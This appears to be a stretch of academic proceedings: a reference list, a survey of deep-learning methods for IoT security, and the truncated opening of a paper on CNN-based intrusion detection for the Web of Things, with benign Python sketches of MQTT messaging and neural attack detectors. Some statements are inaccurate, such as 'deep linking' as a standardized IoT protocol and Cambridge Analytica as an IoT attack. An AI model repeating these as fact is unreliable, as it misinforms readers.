References 1. Ibarra, D., Ganzarain, J., Igartua, J.I.: Business model innovation through Industry 4.0: a review. Procedia Manuf. 22, 4–10 (2018) 2. Alicke, K., Rachor, J., Seyfert, A.: Supply chain 4.0–the next-generation digital supply chain. McKinsey (2016). https://www.mckinsey.com/business-functions/operations/our-ins ights/supply-chain-40-the-nextgeneration-digital-supply-chain. Accessed 6 Sept 2018 3. Garay-Rondero, C.L., Martinez-Flores, J.L., Smith, N.R., Morales, S.O.C., AldretteMalacara, A.: Digital supply chain model in Industry 4.0. J. Manuf. Technol. Manag. (2019) 4. Ehie, I., Ferreira, L.M.D.: Conceptual development of supply chain digitalization framework. In: IFAC-PapersOnLine, vol. 52, no 13, pp. 2338–2342 (2019) 5. Ernst and Young: Digital Supply Chain: It is All About That Data (2016) 6. Ivanov, D.: Viable supply chain model: integrating agility, resilience and sustainability perspectives—lessons from and thinking beyond the COVID-19 pandemic. Ann. Oper. Res. 319, 1–21 (2020). https://doi.org/10.1007/s10479-020-03640-6 7. Queiroz, M.M., Telles, R.: Big data analytics in supply chain and logistics: an empirical approach. Int. J. Logist. Manag. 29, 767–783 (2018) 8. Queiroz, M.M., Fosso Wamba, S., De Bourmont, M., Telles, R.: Blockchain adoption in operations and supply chain management: empirical evidence from an emerging economy. null, 1–17 (2020). https://doi.org/10.1080/00207543.2020.1803511 9. Ghadge, A., Kara, M.E., Moradlou, H., Goswami, M.: The impact of Industry 4.0 implementation on supply chains. J. Manuf. Technol. Manag. 31, 669–686 (2020) 10. Kouhizadeh, M., Saberi, S., Sarkis, J.: Blockchain technology and the sustainable supply chain: theoretically exploring adoption barriers. Int. J. Prod. Econ. 231, 107831 (2021). https:// doi.org/10.1016/j.ijpe.2020.107831 11. Koh, L., Orzes, G., Jia, F.J.: The fourth industrial revolution (Industry 4.0): technologies disruption on operations and supply chain management. Int. J. Oper. Prod. Manag. 39, 819–828 (2019) 12. Wang, Y., Chen, C.H., Zghari-Sales, A.: Designing a blockchain enabled supply chain. Int. J. Prod. Res. 1–26 (2020) 13. Ivanov, D., Predicting the impacts of epidemic outbreaks on global supply chains: a simulation-based analysis on the coronavirus outbreak (COVID-19/SARS-CoV-2) case. Transport. Res. Part E Logist. Transport. Rev. 136, 101922 (2020). https://doi.org/10.1016/j. tre.2020.101922 14. Korpela, K., Hallikas, J., Dahlberg, T.: Digital supply chain transformation toward blockchain integration, January 2017. https://doi.org/10.24251/HICSS.2017.506 15. Manyika, J., et al.: Harnessing Automation for a Future that Works. McKinsey Global Institute (2017) 16. Büyüközkan Feyzio˘glu, G., Gocer, F.: Digital Supply Chain: Literature review and a proposed framework for future research (2018) 17. Chick, G., Handfield, R.: The Procurement Value Proposition: The Rise of Supply Management. Kogan Page Publishers, London (2014)


18. Demetriou, G.A.: Mobile robotics in education and research. Mob. Robots-Curr. Trends, 27–48 (2011) 19. Dubey, R., et al.: Big data analytics and artificial intelligence pathway to operational performance under the effects of entrepreneurial orientation and environmental dynamism: a study of manufacturing organisations. Int. J. Prod. Econ. 226, 107599 (2020) 20. Frederico, G.F., Garza-Reyes, J.A., Anosike, A., Kumar, V.: Supply Chain 4.0: concepts, maturity and research agenda. Supply Chain Manag. Int. J. (2019) 21. Ivanov, D., Tsipoulanidis, A., Schönberger, J.: Digital supply chain, smart operations and Industry 4.0. In: Ivanov, D., Tsipoulanidis, A., Schönberger, J. (eds.) Global Supply Chain and Operations Management. Springer Texts in Business and Economics, pp. 481–526. Springer, Cham (2019) (2019). https://doi.org/10.1007/978-3-319-94313-8_16 22. Lohmer, J., Bugert, N., Lasch, R.: Analysis of resilience strategies and ripple effect in blockchain-coordinated supply chains: an agent-based simulation study. Int. J. Prod. Econ. 228, 107882 (2020) 23. Queiroz, M.M., Telles, R., Bonilla, S.H.: Blockchain and supply chain management integration: a systematic review of the literature. Supply Chain Manag. Int. J. (2019) 24. Wu, Y.U.N., Cegielski, C.G., Hazen, B.T., Hall, D.J.: Cloud computing in support of supply chain information system infrastructure: understanding when to go to the cloud. J. Supply Chain Manag. 49(3), 25–41 (2013) 25. Wang, S., Wan, J., Li, D., Zhang, C.: Implementing smart factory of Industrie 4.0: an outlook. Int. J. Distrib. Sens. Netw. 12(1), 3159805 (2016) 26. Hofmann, E., Rüsch, M.: Industry 4.0 and the current status as well as future prospects on logistics. Comput. Ind. 89, 23–34 (2017) 27. Wamba, S.F., Akter, S., Edwards, A., Chopin, G., Gnanzou, D.: How ‘big data’ can make big impact: findings from a systematic review and a longitudinal case study. Int. J. Prod. Econ. 165, 234–246 (2015) 28. Bahrin, M.A.K., Othman, M.F., Azli, N.N., Talib, M.F.: Industry 4.0: a review on industrial automation and robotic. Jurnal Teknologi 78(6–13), 137–143 (2016) 29. Hu, H., Wen, Y., Chua, T.-S., Li, X.: Toward scalable systems for big data analytics: a technology tutorial. IEEE Access 2, 652–687 (2014) 30. Haenlein, M., Kaplan, A.: A brief history of artificial intelligence: on the past, present, and future of artificial intelligence. Calif. Manag. Rev. 61(4), 5–14 (2019) 31. Chung, C.H.: The Kaizen Wheel–an integrated philosophical foundation for total continuous improvement. TQM J. (2018) 32. Pei, J., Liu, X., Fan, W., Pardalos, P.M., Lu, S.: A hybrid BA-VNS algorithm for coordinated serial-batching scheduling with deteriorating jobs, financial budget, and resource constraint in multiple manufacturers. Omega 82, 55–69 (2019) 33. Mishra, D., Gunasekaran, A., Papadopoulos, T., Childe, S.J.: Big Data and supply chain management: a review and bibliometric analysis. Ann. Oper. Res. 270(1–2), 313–336 (2016). https://doi.org/10.1007/s10479-016-2236-y 34. Mishra, D., Sharma, R.R.K., Gunasekaran, A., Papadopoulos, T., Dubey, R.: Role of decoupling point in examining manufacturing flexibility: an empirical study for different business strategies. Tot. Qual. Manag. Bus. Excellence 30(9–10), 1126–1150 (2019) 35. Okano, M.T., IOT and industry 4.0: the industrial new revolution. In: International Conference on Management and Information System, pp. 75–82 (2017) 36. 
Majeed, A.A., Rupasinghe, T.D.: Internet of things (IoT) embedded future supply chains for industry 4.0: an assessment from an ERP-based fashion apparel and footwear industry. Int. J. Supply Chain Manag. 6(1), 25–40 (2017) 37. Swan, M.: Blockchain: Blueprint for a New Economy. O’Reilly Media, Inc., Sebastopol (2015)


38. Al-Saqaf, W., Seidler, N.: Blockchain technology for social impact: opportunities and challenges ahead. J. Cyber Policy 2(3), 338–354 (2017) 39. Wang, Y.: Designing a blockchain enabled supply chain. In: IFAC-PapersOnLine, vol. 52, no. 13, pp. 6–11 (2019). https://doi.org/10.1016/j.ifacol.2019.11.082 40. Ivanˇci´c, L., Vugec, D.S., Vukši´c, V.B.: Robotic process automation: systematic literature review. In: International Conference on Business Process Management, pp. 280–295 (2019) 41. Huang, F., Vasarhelyi, M.A.: Applying robotic process automation (RPA) in auditing: a framework. Int. J. Account. Inf. Syst. 35, 100433 (2019) 42. Lacity, M., Willcocks, L., Craig, A.: Service automation: cognitive virtual agents at SEB Bank. In: The Outsourcing Unit Working Research Paper Series (2017) 43. Badger, M.L., Grance, T., Patt-Corner, R., Voas, J.M.: Cloud Computing Synopsis and Recommendations. National Institute of Standards & Technology, Gaithersburg (2012) 44. Mell, P., Grance, T.: The NIST definition of cloud computing (2011) 45. Mitra, A., Kundu, A., Chattopadhyay, M., Chattopadhyay, S.: A cost-efficient one time password-based authentication in cloud environment using equal length cellular automata. J. Industr. Inf. Integr. 5, 17–25 (2017) 46. Aviles, M.E.: The impact of cloud computing in supply chain collaborative relationships, collaborative advantage and relational outcomes (2015) 47. Gunasekaran, A., Subramanian, N., Papadopoulos, T.: Information technology for competitive advantage within logistics and supply chains: a review. Transport. Res. Part E Logist. Transport. Rev. 99, 14–33 (2017) 48. Jede, A., Teuteberg, F.: Integrating cloud computing in supply chain processes: a comprehensive literature review. J. Enterp. Inf. Manag. 28(6), 872–904 (2015). https://doi.org/10.1108/ JEIM-08-2014-0085 49. Ben-Daya, M., Hassini, E., Bahroun, Z.: Internet of things and supply chain management: a literature review. Int. J. Prod. Res. 57(15–16), 4719–4742 (2019). https://doi.org/10.1080/ 00207543.2017.1402140 50. Bechtold, J., Lauenstein, C., Kern, A., Bernhofer, L.: Industry 4.0 - the Capgemini consulting view. Capgemini Consult. 31, 32–33 (2014) 51. Hanifan, G., Sharma, A., Newberry, C.: The digital supply network: a new paradigm for supply chain management. Accenture Glob. Manag. Consult. 1–8 (2014) 52. Schrauf, S., Berttram, P.: Industry 4.0: how digitization makes the supply chain more efficient, agile, and customer-focused. Strategy& (2016). Recuperado de https://www.strategyand.pwc. com/media/file/Industry4.0.pdf 53. Raj, S., Sharma, A.: Supply chain management in the cloud. Accenture Glob. Manag. Consult. 1–12 (2014) 54. Cukier, K., Mayer-Schonberger, V.: Big Data: La révolution des données est en marche. Robert Laffont (2014) 55. Tranfield, D., Denyer, D., Smart, P.: Towards a methodology for developing evidenceinformed management knowledge by means of systematic review. Br. J. Manag. 14(3), 207–222 (2003) 56. Meho, L.I., Yang, K.: Impact of data sources on citation counts and rankings of LIS faculty: Web of Science versus Scopus and Google Scholar. J. Am. Soc. Inf. Sci. Technol. 58(13), 2105–2125 (2007)

IoT Systems Security Based on Deep Learning: An Overview
El Mahdi Boumait(B), Ahmed Habbani, and Reda Mastrouri
Smart Systems Laboratory, ENSIAS, Mohammed V University in Rabat, Rabat, Morocco
{elmahdi_boumait2,ahmed.habbani,reda_mastouri}@um5.ac.ma

Abstract. The Internet of Things (IoT) has quickly turned into one of the most advanced commercial and technological domains. IoT technologies are crucial for developing a range of smart applications in the real world to improve the quality of life. However, robust security systems, privacy, authentication and attack recovery mechanisms are needed. This study is aimed at deep analysis of the security difficulties and threat sources in IoT applications as well as state-of-the-art Deep Learning approaches to achieve a high level of confidence and security in IoT systems. Keywords: IoT · Security · Artificial Intelligence · Deep Learning

1 Introduction
The Internet of Things plays a major role in many parts of our everyday life. It contributes to the development of numerous sectors, such as healthcare, automotive, entertainment, industrial goods, sports, homes, etc. The pervasive nature of IoT facilitates daily tasks, enhances how people connect, and extends our social relationships to people and objects. However, this comprehensive vision also raises questions, such as the level of IoT security and how user privacy is provided and safeguarded. The remaining sections of this paper are organized as follows:
• Section 2 presents general notions of IoT security threats per layer.
• Section 3 reviews the history of IoT attacks.
• Section 4 expands on Deep Learning and IoT security.
• Section 5 discusses open issues and research directions.

2 IoT Security Threats Per Layer
The IoT layered architecture is complex. To keep the system stable, we need to understand the types of security issues and prospective threats at each layer, and security problems should be addressed from the start when considering the system as a whole. Each layer (see Fig. 1) includes a plethora of threats and attack types. Eavesdropping, for example, is a common occurrence in the sensing layer.


Certain IoT applications are vulnerable to eavesdroppers: during several processes, such as data transmission or authentication, attackers may eavesdrop and seize data [1]. The DDoS attack is the best-known attack on the network layer; in this sort of attack, a huge number of unwanted requests floods the target, deactivating the server and disrupting services for authenticated users [2]. The Man-In-The-Middle attack, on the other hand, poses a threat to the data processing layer. The MQTT protocol uses a publish/subscribe paradigm in which the MQTT broker acts as an intermediary between publishing and subscribing clients, so messages can be intercepted and relayed without the awareness of the receiver [1]. Finally, the application layer is vulnerable to a variety of assaults; reprogramming attacks are one example. If the programming system is not secured, attackers may be able to remotely reprogram IoT devices, which could result in the IoT network being compromised [3].

Fig. 1. IoT security attacks per layer
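To make the publish/subscribe model concrete, the short Python sketch below (not taken from the paper; the broker address and topic are hypothetical) shows a publisher and a subscriber exchanging a sensor reading through an MQTT broker with the paho-mqtt library. Because the broker relays every message, an attacker who can reach or impersonate an unsecured broker sits naturally in the middle of the exchange.

```python
# Minimal sketch (not from the paper) of the MQTT publish/subscribe pattern
# discussed above, using the paho-mqtt client. Broker address and topic are
# illustrative placeholders. Without TLS and authentication, anyone able to
# reach (or impersonate) the broker can read or inject these messages, which
# is what makes the man-in-the-middle scenario possible.
import paho.mqtt.client as mqtt

BROKER = "broker.example.local"          # hypothetical broker host
TOPIC = "home/livingroom/temperature"

def on_message(client, userdata, msg):
    # Every subscriber to the topic receives the payload via the broker;
    # the publisher never learns who actually consumed it.
    print(f"{msg.topic}: {msg.payload.decode()}")

subscriber = mqtt.Client()
subscriber.on_message = on_message
subscriber.connect(BROKER, 1883)         # 1883 = default unencrypted MQTT port
subscriber.subscribe(TOPIC)
subscriber.loop_start()

publisher = mqtt.Client()
publisher.connect(BROKER, 1883)
publisher.publish(TOPIC, payload="21.5")  # plaintext sensor reading

subscriber.loop_stop()
```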

3 History of IoT Security Attacks
In the development of IoT, security generally takes second place, so defense measures are often very weak, which threatens the entire IoT system. In the following, we present some examples from the history of attacks on IoT systems.
• Mirai Botnet Attack: The Mirai botnet attack, which started in late 2016, became the world's largest DDoS attack at the time. It directly targeted the service provider Dyn by using botnet malware installed on IoT devices. Major websites, including Reddit, Netflix, CNN, and San Francisco-based Twitter, were taken offline as a result of the attack. Once a machine has been infected with the Mirai malware, it continues to look for other IoT devices
that are vulnerable on the Internet, tracks them down, and uses well-known default usernames and passwords to gain access and spread the Mirai malware. A major chunk of the compromised equipment consisted of digital cameras and DVR players [4].
• Man-In-The-Middle Attack: In 2015, a gang in Europe used Man-in-the-Middle (MiTM) attacks to intercept SOPHOS payment requests [5]. According to reports, the gang obtained around EUR 6 million. They supposedly acquired illegal access by monitoring and sniffing payment requests in company email accounts [5].
• The Jeep Hack: In July 2015, a team of researchers exploited a weakness in software updates to take control of the car through the Sprint mobile network [5]. They found that they could regulate the vehicle's speed and even swerve it off the road [5].
• SAGE Hack: Sage, a UK-based accounting and HR software provider, was the subject of an insider unauthorized-access attack in 2016 [5]. A company employee exploited unauthorized access to acquire sensitive client information, including salary and bank account details.
• Cambridge Analytica Attack: In March 2018, it was revealed that Cambridge Analytica had obtained private information on over 50 million Facebook users. The company stated that it had amassed over 5,000 data points on every single American voter [5] and claimed to be able to establish a person's personality type and then send micro-targeted communications to affect their behavior, by performing behavioral or "psychographic" analysis of the datasets in its possession.

4 Deep Learning and IoT Security
Deep Learning (DL) can be considered a more advanced field of Machine Learning. Deep Learning is a set of algorithms that imitate the neural networks of the human brain; the computer learns by itself, the depth of the model is determined by its number of layers, and DL can extract complex information from data automatically. The most notable advantage of deep learning is its higher performance on huge datasets [6]. Deep Learning techniques are therefore well suited to IoT devices, which generate large volumes of data. In addition, the IoT ecosystem can be closely connected with Deep Learning methods. Deep linking is a standardized protocol that makes it possible to communicate automatically with IoT-based devices and apps without human intervention; for example, IoT devices in a house can interact automatically to form a smart home. All of these possibilities have made the application of Deep Learning to IoT systems in general, and to the security axis in particular, a vital research topic. As shown in Fig. 2, the number of studies and papers in this area is growing at an exponential rate.

Fig. 2. Documents on Deep Learning applications to IoT security indexed in the Scopus database

Authentication and access control. Shi et al. [7] suggested a user authentication mechanism for the Internet of Things based on human physiological processes captured via Wi-Fi signals. The suggested authentication system combines activity recognition and human identification: channel state information extracted from the Wi-Fi signals generated by IoT devices is used to characterize various behavioral aspects. To learn the physiological and behavioral features employed in authentication, the authors deployed a three-layer Deep Neural Network and measured how accurately their technique identifies users and detects spoofers. The results show an average user authentication accuracy of 91.2% and a spoofer detection accuracy of 89.7%. Das et al. [8] presented a Long Short-Term Memory (LSTM)-based authentication solution. The LSTM is used to learn the hardware imperfections that affect signal strength when different carrier frequencies are used by a device; the trained model then uses these imperfections to identify users. Such a solution must also be examined in the presence of adversaries: the authors evaluated their technique on a testbed of low-power devices and radios comprising a single genuine node and 29 adversaries, and determined that a two-layer LSTM is the optimal network, achieving a classification accuracy of 99.58%.

Attack detection and mitigation. Diro et al. [9] proposed a Deep Learning-based threat detection algorithm for IoT systems, implemented mostly near the edge of the smart infrastructure. The distributed attack detection mechanism takes into account a number of learning factors when determining how the learning architecture performs on the provided data. Because of resource limits and the nature of IoT applications, a fog infrastructure is justified: for critical infrastructure, the learning mechanism should be located as close as feasible to the data-generating nodes in order to make quick and informed judgments in the event of an attack. The results indicate that the overall detection accuracy increased from around 96% to over 99%. Abeshu et al. [10] proposed a distributed Deep Learning-based attack detection algorithm for the Internet of Things, applying deep learning to a fog computing architecture for threat detection. The proposed technique focuses on fog-to-things communication, with the learning module in the fog layer, the optimal place for the sensing process as it reduces communication latency while maximizing resource utilization. The recommended three-layer autoencoder achieves a precision rate of 99.2%.
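As a concrete illustration of the kind of model behind these attack-detection results, the following sketch (our own addition, not code from the cited works; the feature dimension and layer sizes are illustrative) shows a small Keras autoencoder trained on benign traffic features only, with the reconstruction error used as an anomaly score at detection time.

```python
# Hedged sketch of an autoencoder-based attack detector: the network is trained
# to reconstruct benign traffic feature vectors, and records whose reconstruction
# error exceeds a threshold are flagged as suspicious. Feature dimension (115)
# and layer widths are illustrative, not taken from the cited papers.
import numpy as np
from tensorflow import keras
from tensorflow.keras import layers

n_features = 115                      # e.g. statistical features of a traffic window
x_benign = np.random.rand(1000, n_features).astype("float32")  # placeholder data

autoencoder = keras.Sequential([
    layers.Input(shape=(n_features,)),
    layers.Dense(32, activation="relu"),   # encoder
    layers.Dense(8, activation="relu"),    # bottleneck
    layers.Dense(32, activation="relu"),   # decoder
    layers.Dense(n_features, activation="sigmoid"),
])
autoencoder.compile(optimizer="adam", loss="mse")
autoencoder.fit(x_benign, x_benign, epochs=10, batch_size=64, verbose=0)

# Threshold chosen from the reconstruction-error distribution on benign training data.
train_err = np.mean((autoencoder.predict(x_benign, verbose=0) - x_benign) ** 2, axis=1)
threshold = np.percentile(train_err, 99)

def is_attack(feature_vector):
    """Flag a single traffic record as anomalous if it reconstructs poorly."""
    x = feature_vector.reshape(1, -1)
    err = np.mean((autoencoder.predict(x, verbose=0) - x) ** 2)
    return err > threshold
```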


Distributed DoS attacks. Alharbi et al. [11] propose a fog-computing-based security system to address the security challenges of the IoT. The work uses a Deep Neural Network to analyze network traffic, detect suspicious traffic sources and consequently detect DDoS behavior. The system leverages a VPN to secure the access channel to the IoT devices and adopts challenge-response authentication to protect the VPN server against distributed denial-of-service (DDoS) attacks. Yuan et al. [12] suggested a deep-learning-based DDoS detection method called DeepDefense. The method relies on a recurrent deep neural network to discover patterns in network traffic sequences and attacks, building powerful high-level representations from low-level characteristics. The experimental results show that, compared to a standard machine learning method, the error rate is reduced from 7.517% to 2.103% on the larger dataset.

Malware analysis in IoT systems. Pajouh et al. [13] suggested a recurrent neural network approach for malware analysis in IoT systems, examining IoT applications based on Advanced RISC Machines (ARM). The authors trained their algorithms on existing malware datasets before testing the approach on new threats, and determined that LSTM classifiers outperform the other classifiers; the RNN approach detected new malware inside IoT applications with 98% accuracy. Deep Q-networks with a Q-learning technique have also been used in IoT healthcare applications to address security concerns for authentication, access control and malware analysis. The authors used the Q-learning methodology to examine patient data via layered Deep Q-networks for authentication and malware analysis. According to the authors, Deep Q-networks use less energy than MLP and Learning Vector Quantization, and the proposed learning-based Deep Q-network achieved the lowest mean error ratio (0.12) and the greatest accuracy (98.79%) among Learning Vector Quantization, MLP, and Back Propagation Neural Network.
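To show what such a recurrent traffic classifier looks like in practice, here is a minimal sketch (our own illustration, not the cited authors' code; sequence length, feature count and layer sizes are assumptions) of an LSTM network that labels a window of packet-level feature vectors as benign or DDoS.

```python
# Hedged sketch of an LSTM-based DDoS/traffic classifier: each training example
# is a window of consecutive packet feature vectors, and the network outputs the
# probability that the window belongs to an attack. Shapes are illustrative only.
import numpy as np
from tensorflow import keras
from tensorflow.keras import layers

window_len, n_features = 20, 11             # 20 packets per window, 11 features each
x = np.random.rand(512, window_len, n_features).astype("float32")  # placeholder windows
y = np.random.randint(0, 2, size=(512,))                            # 0 = benign, 1 = DDoS

model = keras.Sequential([
    layers.Input(shape=(window_len, n_features)),
    layers.LSTM(64, return_sequences=True),   # first recurrent layer keeps the sequence
    layers.LSTM(32),                          # second recurrent layer summarizes it
    layers.Dense(1, activation="sigmoid"),    # attack probability for the whole window
])
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
model.fit(x, y, epochs=5, batch_size=64, verbose=0)

# At detection time, windows scoring above 0.5 would be reported as suspected DDoS traffic.
scores = model.predict(x[:5], verbose=0).ravel()
print((scores > 0.5).astype(int))
```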

5 Conclusion
In this paper, we have examined the various IoT layers, the security of IoT systems, and the history of attacks. We reviewed the roles and applications of DL in the IoT from the standpoints of security and privacy. This state of the art seeks to provide a guide that can motivate researchers to advance IoT system security. Future work will be dedicated to a comparative study of deep learning techniques to test their effectiveness in achieving the planned objectives in terms of forecasting and detection.

References 1. Hassija, V., Chamola, V., Saxena, V., Jain, D., Goyal, P., Sikdar, B.: A survey on IoT security: application areas, security threats, and solution architectures. IEEE Access 7 (2019). https://doi.org/10.1109/ACCESS.2019.2924045


2. Kolias, C., Kambourakis, G., Stavrou, A., Voas, J.: ‘DDoS in the IoT: Mirai and other Botnets.’ Computer 50(7), 80–84 (2017). https://doi.org/10.1109/MC.2017.201 3. McDermott, B.: 5 of the Worst IoT Hacking Threats in History (So Far). Dogtown Media, March 2020 4. Sengupta, J., Ruj, S., Bit, S.D.: A comprehensive survey on attacks, security issues and blockchain solutions for IoT and IIoT. J. Netw. Comput. Appl. 149 (2020). https://doi.org/ 10.1016/j.jnca.2019.102481 5. Westby, J.: The Great Hack: Cambridge Analytica n’est que la partie visible de l’iceberg. Amnesty International, July 2019 6. Fatani, A., Abd Elaziz, M., Dahou, A., Al-Qaness, M.A.A., Lu, S.: IoT intrusion detection system using deep learning and enhanced transient search optimization. IEEE Access 9, 123448–123464 (2021). https://doi.org/10.1109/ACCESS.2021.3109081.(32) 7. Shi, C., Liu, J., Liu, H., Chen, Y.: Smart user authentication through actuation of daily activities leveraging WIFI-enabled IoT. In: Proceedings of the 18th ACM International Symposium on Mobile Ad Hoc Networking and Computing, Mobihoc 2017, New York, NY, USA, pp. 5:1– 5:10. ACM (2017). https://doi.org/10.1145/3084041.3084061(23) 8. Das, R., Gadre, A., Zhang, S., Kumar, S., Moura, J.M.F.: A deep learning approach to IoT authentication. In: 2018 IEEE International Conference on Communications (ICC), pp. 1–6, May 2018. https://doi.org/10.1109/ICC.2018.8422832(24) 9. Diro, A.A., Chilamkurti, N.: Distributed attack detection scheme using deep learning approach for internet of things. Future Gener. Comput. Syst. 82, 761–768 (2018). https://doi.org/10. 1016/j.future.2017.08.043(25) 10. Abeshu, A., Chilamkurti, N.: Deep learning: the frontier for distributed attack detection in fog-to-things computing. IEEE Commun. Mag. 56, 169–175 (2018). https://doi.org/10.1109/ MCOM.2018.1700332(26) 11. Alharbi, S., Rodriguez, P., Maharaja, R., Iyer, P., Subaschandrabose, N., Ye, Z.: Secure the internet of things with challenge response authentication in fog computing. In: 2017 IEEE 36th International Performance Computing and Communications Conference (IPCCC) (2017). https://doi.org/10.3390/electronics10101171(27) 12. Yuan, X., Li, C., Li, X.: DeepDefense: identifying DDoS attack via deep learning. In: 2017 IEEE International Conference on Smart Computing (SMARTCOMP), pp. 1–8 (2017). https:// doi.org/10.1109/SMARTCOMP.2017.7946998(28) 13. HaddadPajouh, H., Dehghantanha, A., Khayami, R., Choo, K.-K.R.: A deep recurrent neural network-based approach for internet of things malware threat hunting. Futur. Gener. Comput. Syst. 85, 88–96 (2018). https://doi.org/10.1016/j.future.2018.03.007(29)

Deep Learning for Intrusion Detection in WoT
Abdelaziz Laaychi(B), Mariam Tanana, Bochra Labiad, and Abdelouahid Lyhyaoui
Laboratory of Innovative Technologies (LTI), National School of Applied Sciences of Tangier, Abdelmalek Essaâdi University, Tetouan, Morocco
{abdelaziz.laaychi,bochra.labiad}@etu.uae.ac.ma
{mtanana,a.lyhyaoui}@uae.ac.ma

Abstract. The Web of Things (WoT) is an evolution of the Internet of Things (IoT). The main objective of WoT is to connect all smart devices via the Internet so that they can share services and resources globally. However, this increase in connectivity makes devices vulnerable to different types of cyber-attacks that affect the normal functioning of smart devices and leak private information. The detection and prevention of cyber-attacks in WoT is therefore an important research issue. In this paper, we propose a deep learning approach based on Convolutional Neural Networks (CNN) for intrusion detection in the WoT environment.

Keywords: WoT · IoT · Security · Deep learning

1 Introduction

The Internet of Things (IoT) provides the platform through which different smart devices can exchange data. To exchange this information, IoT devices use the Internet as a medium along with different types of protocols, such as IEEE 802.15.4, 6LoWPAN, etc., whose main purpose is to transfer data at low cost and low power. However, IoT devices do not have direct global connectivity, hence the introduction of the Web of Things (WoT) concept. The WoT standard is established by the W3C consortium [1] so that IoT devices can connect to any other IoT device, regardless of geographical location, through the web. WoT standards are still in the development phase and researchers have proposed different standards and architectures for the WoT [2]. In general, the WoT architecture can be divided into four layers (see Fig. 1), explained as follows:
– Reachability layer: connects the physical IoT devices to the Internet through different web protocols such as HTTP, REST APIs, CoAP, etc.
– Search/Execution layer: provides interoperability, smooth connectivity, etc., so that the corresponding IoT device can easily be found.


– Sharing/Proxy layer: responsible for the security and privacy of IoT devices in the WoT environment.
– Composition layer: the highest layer in the WoT architecture, which connects users to the WoT environment.

Fig. 1. The WoT architecture [3]
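As a small illustration of the Reachability layer described above, the sketch below (our own addition, with a hypothetical device URL, property name and JSON payload; not part of the paper) reads a property from a WoT-exposed device over plain HTTP/REST using the requests library.

```python
# Hedged sketch: querying a hypothetical WoT device that exposes its properties
# over HTTP/REST, as the Reachability layer suggests. The host, path and JSON
# shape are illustrative assumptions, not a real device API.
import requests

DEVICE_URL = "http://192.168.1.50:8080/things/temperature-sensor"

def read_property(name: str) -> float:
    """Fetch one property value from the device's REST interface."""
    response = requests.get(f"{DEVICE_URL}/properties/{name}", timeout=5)
    response.raise_for_status()
    return response.json()["value"]          # assumed payload: {"value": 21.5}

if __name__ == "__main__":
    print("Current temperature:", read_property("temperature"))
```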

Devices in the WoT environment have limited computing power and handle users' personal and private information, which makes them very vulnerable. In this context, we propose a deep learning-based security model for intrusion detection in the WoT environment. According to [4], a deep learning model is first trained with data from the network in question: it learns the distributions of the different classes (i.e., benign and malicious traffic) and, during testing, we determine how well it can discriminate between classes, returning to training and adjusting hyperparameters if its performance is suboptimal. The training and testing cycle, and the experimentation with different models and architectures, continue until the best model is ready for deployment. During deployment, the model intercepts traffic and predicts whether a packet is normal or suspicious; in the latter case, the system administrator is notified, or the packet may be automatically blocked (a minimal sketch of this workflow is given below). The rest of the paper is organized as follows: Sect. 2 presents the literature review, Sect. 3 gives insight into our proposed approach, and Sect. 4 concludes the paper.
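The following sketch illustrates the train/test/deploy workflow just described with a small 1D CNN binary classifier. It is a generic illustration, not the architecture proposed in the paper; the feature count, layer sizes and placeholder data are assumptions.

```python
# Hedged sketch of the train/test/deploy workflow above with a small 1D CNN
# binary classifier (benign vs. malicious). This is a generic illustration,
# not the model proposed in the paper; the 41 input features echo classic IDS
# datasets and are an assumption.
import numpy as np
from tensorflow import keras
from tensorflow.keras import layers
from sklearn.model_selection import train_test_split

n_features = 41
X = np.random.rand(2000, n_features, 1).astype("float32")   # placeholder feature vectors
y = np.random.randint(0, 2, size=(2000,))                    # 0 = benign, 1 = malicious

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)

model = keras.Sequential([
    layers.Input(shape=(n_features, 1)),
    layers.Conv1D(32, kernel_size=3, activation="relu"),
    layers.MaxPooling1D(pool_size=2),
    layers.Conv1D(64, kernel_size=3, activation="relu"),
    layers.GlobalMaxPooling1D(),
    layers.Dense(64, activation="relu"),
    layers.Dense(1, activation="sigmoid"),                    # probability of malicious
])
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])

# Training / testing cycle: adjust hyperparameters and retrain until satisfied.
model.fit(X_train, y_train, validation_data=(X_test, y_test),
          epochs=5, batch_size=64, verbose=0)

# Deployment step: score an incoming packet's features and alert or block if suspicious.
def inspect(packet_features):
    score = model.predict(packet_features.reshape(1, n_features, 1), verbose=0)[0, 0]
    return "suspicious" if score > 0.5 else "normal"
```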

2 Related Work

The massive growth in data transmission via various IoT and WoT communication devices and protocols has increased security concerns, highlighting the need for effective IDS. In this section, we reviewed the latest security methods that use deep learning techniques, and compared their performance. Gaurav et al. [5] proposed a Deep-learning-based approach for the detection of different cyber attacks like DoS, U2R, R2L in the WoT devices. The author used the KDDCUP99 dataset for evaluating the proposed approach and for comparing the proposed approach with the other machine learning techniques. The proposed approach detects the attack features in the WoT environment from the incoming traffic through a deep learning model and then blacklists the malicious IP addresses so that only legitimated traffic can pass through the WoT environment. Apostol et al. [6] propose an IoT botnet anomaly detection solution based on a deep autoencoder model. The proposed model uses unsupervised deep learning techniques to identify IoT botnet activities. An empirical evaluation of the proposed method is conducted on balanced and unbalanced datasets to evaluate its threat detection capability. The reduction in false positive rate and its impact on the detection system are also analyzed. In addition, a comparison with other unsupervised learning approaches is included. Chatterjee et al. [7] propose a probabilistic hybrid ensemble classifier (PHEC) in IoT security in centralized settings, then they adapt it to a federated learning framework that performs local training and aggregates only the model parameters. Then they propose Noise-Tolerant PHEC in centralized and federated settings to solve the label-noise problem. The proposed idea uses classifiers using weighted convex substitution loss functions. Natural robustness of KNN classifier towards noisy data is also used in the proposed architecture. The author has used four datasets, namely ‘NSL-KDD’, ‘DS2OS Traffic Traces’, ‘Gas Pipeline Dataset’ and ‘Water Tank Dataset’. The experimental results show that their model achieves high TPR while keeping low FPR on clean and noisy data. They also demonstrate that the hybrid ensemble models achieve performance in federated settings close to that of the centralized settings. Ferrag et al. [8] compare federated deep learning approaches for cybersecurity in IoT applications. They analyzed federated learning-based security and privacy systems for several types of IoT applications. Then, they provided an experimental analysis of federated deep learning with three deep learning approaches, namely RNN, CNN and DNN. For each deep learning model, they investigated the performance of centralized and federated learning under three IoT traffic datasets, namely the Bot-IoT dataset, the MQTTset dataset, and the TON_IoT dataset. The results demonstrate that federated deep learning approaches can outperform the classic/centralized versions of machine learning (non-federated learning) in assuring the privacy of IoT device data and provides the highest accuracy in attack detection. Aversano et al. [9] combine five different anomalous IoT traffic datasets and evaluate them with a deep learning approach capable of identifying normal and


